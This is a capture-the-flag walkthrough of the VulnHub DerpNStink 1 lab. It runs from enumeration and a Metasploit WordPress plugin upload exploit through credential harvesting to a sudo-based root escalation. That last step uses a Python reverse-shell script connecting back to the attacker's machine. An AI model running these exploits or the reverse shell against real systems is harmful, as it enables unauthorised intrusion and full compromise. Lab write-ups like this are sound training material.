VulnHub: DerpNStink 1 Walkthrough

DerpNStink 1 is another intentionally vulnerable machine on VulnHub by Bryan Smith.

Enumeration

Starting Enumeration with AutoRecon.

Nmap scan report for 192.168.50.151
Host is up, received arp-response (0.0023s latency).
Scanned at 2021-12-30 19:41:32 EST for 11s
Not shown: 997 closed ports
Reason: 997 resets
PORT   STATE SERVICE REASON         VERSION
21/tcp open  ftp     syn-ack ttl 64 vsftpd 3.0.2
22/tcp open  ssh     syn-ack ttl 64 OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.8 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    syn-ack ttl 64 Apache httpd 2.4.7 ((Ubuntu))

There is no anonymous login in FTP.

We start with port 80.

Landing page is cool. Nothing in the source code. There is a robots.txt too.

User-agent: *
Disallow: /php/
Disallow: /temporary/

/temporary says try harder and /php is forbidden.

So, we'll have a look at the dirbusting results.

301        9l       28w      313c http://192.168.50.151/css
200      131l       95w     1298c http://192.168.50.151/index.html
301        9l       28w      320c http://192.168.50.151/javascript
301        9l       28w      312c http://192.168.50.151/js
301        9l       28w      313c http://192.168.50.151/php
200        4l        6w       53c http://192.168.50.151/robots.txt
403       10l       30w      294c http://192.168.50.151/server-status
301        9l       28w      319c http://192.168.50.151/temporary
301        9l       28w      316c http://192.168.50.151/weblog

None of the above ring a bell except /weblog which redirects to derpnstink.local.

So, we'll add the following entry to the /etc/hosts file and take it from there.

192.168.50.151 derpnstink.local

Browsing to http://derpnstink.local/weblog/, we find a blogpost hosted with Wordpress. Interesting!

So, we fire up wpscan to enumerate the wordpress site.

┌──(root💀kali)-[/etc]
└─# wpscan --url http://derpnstink.local/weblog/ --enumerate p
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.18
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[+] URL: http://derpnstink.local/weblog/ [192.168.50.151]
[+] Started: Thu Dec 30 20:34:52 2021

        --snip--

[+] slideshow-gallery
 | Location: http://derpnstink.local/weblog/wp-content/plugins/slideshow-gallery/
 | Last Updated: 2021-12-21T06:31:00.000Z
 | [!] The version is out of date, the latest version is 1.7.4.4
 |
 | Found By: Urls In Homepage (Passive Detection)
 |
 | Version: 1.4.6 (100% confidence)
 | Found By: Readme - Stable Tag (Aggressive Detection)
 |  - http://derpnstink.local/weblog/wp-content/plugins/slideshow-gallery/readme.txt
 | Confirmed By: Readme - ChangeLog Section (Aggressive Detection)
 |  - http://derpnstink.local/weblog/wp-content/plugins/slideshow-gallery/readme.txt

There is a slideshow plugin and with a little searchsploit, the plugin is vulnerable to arbitrary file upload.

A little more trial and error on /weblog/wp-admin/ and admin:admin gives us admin access to the wordpress.

Initial Foothold

We are going to use metasploit to exploit the vulnerability in slideshow plugin, alternatively, there's a python script on exploit-db to do so manually.

msf6 > use exploit/unix/webapp/wp_slideshowgallery_upload
[*] No payload configured, defaulting to php/meterpreter/reverse_tcp
msf6 exploit(unix/webapp/wp_slideshowgallery_upload) > set RHOSTS http://derpnstink.local/weblog/
RHOSTS => http://derpnstink.local/weblog/
msf6 exploit(unix/webapp/wp_slideshowgallery_upload) > set WP_USER admin
WP_USER => admin
msf6 exploit(unix/webapp/wp_slideshowgallery_upload) > set WP_PASSWORD admin
WP_PASSWORD => admin
msf6 exploit(unix/webapp/wp_slideshowgallery_upload) > exploit

Make sure LHOST and LPORT are proper and then hit exploit.

 meterpreter > shell
 python -c 'import pty; pty.spawn("/bin/bash")'
python -c 'import pty; pty.spawn("/bin/bash")'
www-data@DeRPnStiNK:/home$whoami
whoami
www-data

We now have a low privileged shell as www-data.

Lateral Movement

After enumerating manually such as looking for cron jobs, files with sudo permissions, if /etc/passwd was writable, or any other files that could be interesting, we did not find anything, so we got the linpeas.sh file from our machine and ran it.

Kernel and ubuntu version was flagged but it did not work.

So, we skim through the magnanimous results generated by linpeas and come across database credentials.

 ╔══════════╣ Analyzing Wordpress Files (limit 70)
-rw-r--r-- 1 www-data root 3123 Nov 11  2017 /var/www/html/weblog/wp-config.php                                                                                                             
define('DB_NAME', 'wordpress');
define('DB_USER', 'root');
define('DB_PASSWORD', 'mysql');
define('DB_HOST', 'localhost');

Use the newly acquired creds to access the database.

www-data@DeRPnStiNK:/tmp$ mysql -u root -p mysql
mysql -u root -p mysql
Enter password: mysql

Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 119
Server version: 5.5.58-0ubuntu0.14.04.1 (Ubuntu)

Copyright (c) 2000, 2017, Oracle and/or its affiliates. All rights reserved.

Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

mysql>

We now have access to database.

 mysql> show database;
show database;
ERROR 1064 (42000): You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'database' at line 1
mysql> show databases;
show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| mysql              |
| performance_schema |
| phpmyadmin         |
| wordpress          |
+--------------------+

mysql> use wordpress
use wordpress
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
mysql> show tables
show tables
    -> ;
;
+----------------------------+
| Tables_in_wordpress        |
+----------------------------+
| wp_commentmeta             |
| wp_comments                |
| wp_gallery_galleries       |
| wp_gallery_galleriesslides |
| wp_gallery_slides          |
| wp_links                   |
| wp_options                 |
| wp_postmeta                |
| wp_posts                   |
| wp_term_relationships      |
| wp_term_taxonomy           |
| wp_termmeta                |
| wp_terms                   |
| wp_usermeta                |
| wp_users                   |
+----------------------------+
15 rows in set (0.00 sec)

wp-users should be interesting.

We have password hashes of users unclestinky and admin.

We can use an online cracker to crack the passwords. No hits for admin but unclestinky's password is wedgie57.

www-data@DeRPnStiNK:/$ su stinky
su stinky
Password: wedgie57

stinky@DeRPnStiNK:/$

We are now uncle stinky.

stinky@DeRPnStiNK:~/Documents$ ls
ls
derpissues.pcap
stinky@DeRPnStiNK:~/Documents$ python -m SimpleHTTPServer 8080
python -m SimpleHTTPServer 8080
Serving HTTP on 0.0.0.0 port 8080 ...
192.168.50.129 - - [31/Dec/2021 02:14:30] "GET /derpissues.pcap HTTP/1.1" 200 -

A little more enumeration and we find a packet capture file in the Documents folder of stinky. So, we take it on our machine to analyze it in WireShark.

We find derp's password in the capture which is derpderpderpderpderpderpderp.

www-data@DeRPnStiNK:/$ su mrderp
su mrderp
Password: derpderpderpderpderpderpderp

mrderp@DeRPnStiNK:

We are now MrDerp.

mrderp@DeRPnStiNK:/$ sudo -l
sudo -l
[sudo] password for mrderp: derpderpderpderpderpderpderp

Matching Defaults entries for mrderp on DeRPnStiNK:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User mrderp may run the following commands on DeRPnStiNK:
    (ALL) /home/mrderp/binaries/derpy*

Checking the sudo permissions, we can execute any binary in the above location which is starting with derpy, extension doesn't matter.

So, we save the following code in a derpy.py and save it in binaries dir. There is no binaries dir so we can create one.

#!/usr/bin/python

import socket, subprocess, os

s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("192.168.50.129",444))

os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
p=subprocess.call(["/bin/sh","-i"])

Make the file executable and call it with sudo while there is a listener setup.

mrderp@DeRPnStiNK:~/binaries$ sudo ./derpy.py
sudo ./derpy.py
[sudo] password for mrderp: derpderpderpderpderpderpderp

At the listener, we shall receive a shell.

┌──(root💀kali)-[/home/kali/Downloads]
└─# nc -nlvp 444                                                                                                                                                                                    1 ⨯
listening on [any] 444 ...
connect to [192.168.50.129] from (UNKNOWN) [192.168.50.151] 52000
# whoami
root

Voila! We got root access.

# cd Desktop
# ls
flag.txt
# cat flag.txt
flag4(49dca65f362fee401292ed7ada96f96295eab1e589c52e4e66bf4aedda715fdd)

Congrats on rooting my first VulnOS!

Hit me up on twitter and let me know your thoughts!

@securekomodo

And there goes our root flag.

Thanks for reading.